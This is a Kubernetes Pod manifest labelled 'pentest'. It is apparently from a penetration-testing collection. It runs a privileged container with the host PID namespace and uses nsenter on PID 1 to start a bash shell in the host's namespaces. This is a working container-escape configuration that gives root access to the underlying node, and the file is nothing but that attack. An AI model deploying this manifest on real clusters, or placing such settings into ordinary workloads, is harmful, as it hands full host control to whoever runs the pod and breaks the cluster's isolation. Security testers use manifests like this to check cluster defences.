apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
    - name: priv-and-hostpid-pod
      image: ubuntu
      tty: true
      securityContext:
        privileged: true
      # command: [sh, -c, "tail -f /dev/null"]
      command:
        [
          "nsenter",
          "--target",
          "1",
          "--mount",
          "--uts",
          "--ipc",
          "--net",
          "--pid",
          "--",
          "bash",
        ]
      args: ["-c","tail -f /dev/null"]

